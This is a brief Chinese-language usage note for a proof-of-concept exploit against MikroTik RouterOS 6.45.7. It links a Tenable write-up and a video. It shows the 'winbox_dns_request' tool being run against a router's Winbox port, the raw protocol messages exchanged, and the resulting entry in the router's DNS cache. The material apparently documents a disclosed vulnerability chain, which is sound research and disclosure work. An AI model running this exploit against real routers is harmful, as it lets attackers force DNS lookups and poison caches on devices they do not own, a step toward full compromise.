验证方式：验证视频+验证文章
文章链接：https://medium.com/tenable-techblog/routeros-chain-to-root-f4e0b07c0b21
验证视频：https://youtu.be/5SW7z0eUDuA
目标产品：MikroTik RouterOS 6.45.7

poc用法：
albinolobster@ubuntu:~/routeros/poc/winbox_dns_request/build$ ./winbox_dns_request -i 192.168.1.50 -p 8291 -s 8.8.8.8
-> {bff0005:1,u1:134744072,uff0006:1,uff0007:3,s3:'example.com',Uff0001:[14]}
<- {u4:584628317,uff0003:2,uff0006:1,s3:'example.com',U6:[584628317],U7:[21496],Uff0001:[],Uff0002:[14],S5:['example.com']}
albinolobster@ubuntu:~/routeros/poc/winbox_dns_request/build$ ssh admin@192.168.1.50
...
[admin@MikroTik] > ip dns cache print
Flags: S - static 
 #   NAME                               ADDRESS                                                              TTL         
 0   example.com                        93.184.216.34                                                        5h57m57s    
[admin@MikroTik] > 

# 